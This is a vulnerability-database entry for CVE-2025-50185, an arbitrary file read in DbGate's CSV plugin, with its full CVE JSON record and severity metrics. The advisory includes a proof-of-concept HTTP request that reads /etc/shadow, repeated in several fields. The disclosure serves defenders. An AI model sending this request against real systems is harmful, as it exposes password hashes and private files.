CVE-2025-50185 (GCVE-0-2025-50185)
Vulnerability from cvelistv5
Published
2025-07-26 03:34
Modified
2025-07-28 18:55
Severity ?
7.0 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P
CWE
  • CWE-29 - Path Traversal: '..filename'
Summary
DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue. ``` POST /runners/load-reader HTTP/1.1 Host: <REPLACE ME> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: <REPLACE ME> Content-Type: application/json Authorization: Bearer <REPLACE ME> Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: <REPLACE ME> Priority: u=0 Cache-Control: max-age=0 {"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)
References
security-advisories@github.comhttps://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102
security-advisories@github.comhttps://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9
134c704f-9b21-4f2e-91b3-4a467353bcc0https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9
Impacted products
Vendor Product Version
dbgate dbgate Version: <= 6.6.0
 Create a notification for this product.
Show details on NVD website

To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-50185",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-28T15:27:58.994623Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-28T18:55:40.184Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "dbgate",
          "vendor": "dbgate",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 6.6.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\n\n\nLines of the file being returned:\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)"
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-29",
              "description": "CWE-29: Path Traversal: \u0027..filename\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-26T03:34:43.481Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
        },
        {
          "name": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"
        }
      ],
      "source": {
        "advisory": "GHSA-7x75-fmx7-q6h9",
        "discovery": "UNKNOWN"
      },
      "title": "DbGate allows Unauthorized File Access via CSV Plugin"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-50185",
    "datePublished": "2025-07-26T03:34:43.481Z",
    "dateReserved": "2025-06-13T19:17:51.726Z",
    "dateUpdated": "2025-07-28T18:55:40.184Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-50185\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-07-26T04:16:04.207\",\"lastModified\":\"2025-07-29T14:14:55.157\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\\n\\n\\n\\n\\n\\n\\n```\\nPOST /runners/load-reader HTTP/1.1\\nHost: \u003cREPLACE ME\u003e\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\\nAccept: */*\\nAccept-Language: en-US,en;q=0.5\\nAccept-Encoding: gzip, deflate, br\\nReferer: \u003cREPLACE ME\u003e\\nContent-Type: application/json\\nAuthorization: Bearer \u003cREPLACE ME\u003e\\nContent-Length: 127\\nOrigin: http://192.168.124.119:3000\\nConnection: keep-alive\\nCookie: \u003cREPLACE ME\u003e\\nPriority: u=0\\nCache-Control: max-age=0\\n\\n{\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}}\\n\\n```\\n\\n\\n\\nThe request payload:\\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\\n\\n\\nLines of the file being returned:\\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"},{\"lang\":\"es\",\"value\":\"DbGate es un gestor de bases de datos multiplataforma. En las versiones 6.6.0 y anteriores, DbGate permite el acceso no autorizado a archivos debido a una validaci\u00f3n insuficiente de las rutas y los tipos de archivo. Un usuario con acceso a nivel de aplicaci\u00f3n puede recuperar datos de archivos arbitrarios en el sistema, independientemente de su ubicaci\u00f3n o tipo de archivo. El complemento no realiza las comprobaciones adecuadas del tipo de contenido y la extensi\u00f3n del archivo antes de leerlo. Como resultado, incluso archivos confidenciales accesibles solo para el usuario root pueden leerse a trav\u00e9s de la interfaz de la aplicaci\u00f3n. Actualmente no hay soluci\u00f3n para este problema.``` POST /runners/load-reader HTTP/1.1 Host:  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer:  Content-Type: application/json Authorization: Bearer  Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie:  Priority: u=0 Cache-Control: max-age=0 {\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.0,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-29\"}]}],\"references\":[{\"url\":\"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-50185\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-28T15:27:58.994623Z\"}}}], \"references\": [{\"url\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-28T15:28:00.673Z\"}}], \"cna\": {\"title\": \"DbGate allows Unauthorized File Access via CSV Plugin\", \"source\": {\"advisory\": \"GHSA-7x75-fmx7-q6h9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"dbgate\", \"product\": \"dbgate\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 6.6.0\"}]}], \"references\": [{\"url\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"name\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\", \"name\": \"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\\n\\n\\n\\n\\n\\n\\n```\\nPOST /runners/load-reader HTTP/1.1\\nHost: \u003cREPLACE ME\u003e\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\\nAccept: */*\\nAccept-Language: en-US,en;q=0.5\\nAccept-Encoding: gzip, deflate, br\\nReferer: \u003cREPLACE ME\u003e\\nContent-Type: application/json\\nAuthorization: Bearer \u003cREPLACE ME\u003e\\nContent-Length: 127\\nOrigin: http://192.168.124.119:3000\\nConnection: keep-alive\\nCookie: \u003cREPLACE ME\u003e\\nPriority: u=0\\nCache-Control: max-age=0\\n\\n{\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}}\\n\\n```\\n\\n\\n\\nThe request payload:\\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\\n\\n\\nLines of the file being returned:\\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-29\", \"description\": \"CWE-29: Path Traversal: \u0027..filename\u0027\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-26T03:34:43.481Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-50185\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-28T18:55:40.184Z\", \"dateReserved\": \"2025-06-13T19:17:51.726Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-26T03:34:43.481Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.